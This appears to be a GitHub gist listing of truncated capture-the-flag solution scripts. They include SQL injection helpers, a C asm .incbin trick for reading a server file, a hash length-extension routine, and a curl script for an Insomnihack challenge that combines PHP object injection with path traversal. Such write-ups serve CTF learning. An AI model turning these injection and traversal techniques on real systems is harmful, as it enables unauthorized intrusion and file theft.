This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import os | |
| import re | |
| import sys | |
| def str_to_list(a): | |
| return ','.join(str(ord(c)) for c in a) | |
| if __name__ == '__main__': | |
| if len(sys.argv) < 2: | |
| print 'gimme argv' |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import base64 | |
| import requests | |
| import time | |
| COMMAND = 'ls' | |
| ### | |
| result = '' | |
| i = len(result) + 1 |
st98
/ exp.py
Created
September 13, 2019 13:51
babysql https://twitter.com/__Sehun_Oh__/status/1171445632210391040
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import json | |
| import requests | |
| import urllib.parse | |
| def f(s): | |
| return 'chr(' + ')||chr('.join(str(ord(c)) for c in s) + ')' | |
| ip = f('::ffff:(IP address)') | |
| res = '' |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import re | |
| import requests | |
| from urllib.parse import quote | |
| code = ''' | |
| 1; | |
| asm goto (""::::a); | |
| goto b; | |
| a: asm(".incbin \\"/srv/olc/public/calc.php\\""); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from pwn import * | |
| s = remote('crypto.kosenctf.com', 8002) | |
| s.recvline() | |
| encrypted = int(s.recvline()) | |
| s.recvline() | |
| table = ''.join(sorted('{}abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_- !?#')) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import re | |
| import requests | |
| def extend(original_hash, data_to_add, start): | |
| T = [5676567, 858051, 5476703, 265259, 4058727, 5112531, 964143, 1099579, 8277687, 8717411, 2022783, 7207499, 1997447, 5864691, 828623, 3917019] | |
| v = [int(x) for x in re.findall(r'.{7}', original_hash)] | |
| i = start | |
| for block in re.findall(r'.{7}', data_to_add)[::-1]: | |
| s = int(block) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import binascii | |
| import os | |
| import string | |
| import sys | |
| import random | |
| from PIL import Image | |
| TEMPLATE = ''' | |
| <!doctype html> | |
| <html> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # `dmin, cdmin, edmin, idmin, qdmin, Admin, !dmin | |
| s = '''3dbd6c666db1e6ecbf391ff37622f30f | |
| bdbd48266da0fee8dd190fe16e26f3cf | |
| 2d9f446765b1cefd95980fa35e32f24f | |
| 1dac5c6e7db1aee08d11a7e33c8ef15f | |
| 3d3d6c664d31fef8bd1d4ee36f32f3cf | |
| 3cbd4c662ca1eec8dd11afc35c0e634e | |
| 3db5c4626db3eef8151d0be37f27e347'''.splitlines() | |
| s = [bin(int(c, 16))[2:].rjust(128, '0') for c in s] |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| URL="http://filevault.teaser.insomnihack.ch" | |
| SANDBOX_DIR="827bfe788a9d99ceecaef263c52e34a1570c8349" | |
| curl -c cookie.txt "$URL/?action=reset" | |
| curl -b cookie.txt -c cookie.txt "$URL/?action=upload" -F "[email protected]" | |
| curl -b cookie.txt -c cookie.txt "$URL/?action=upload" -F "[email protected]" | |
| curl -b cookie.txt -c cookie.txt "$URL/?action=changename&i=1" -d 'newname=;s:8:"realname";s:9:"aaaaaaaaa";}i:1;O:10:"ZipArchive":5:{s:6:"status";i:0;s:9:"statusSys";i:0;s:8:"numFiles";i:0;s:8:"realname";i:8;s:8:"filename";s:67:"' | |
| curl -b cookie.txt -c cookie.txt "$URL/?action=changename&i=0" -d "newname=../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../.php" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import hashlib | |
| import hmac | |
| import json | |
| import sys | |
| import urlparse | |
| import requests | |
| from Crypto.Cipher import AES | |
| def xor(a, b): |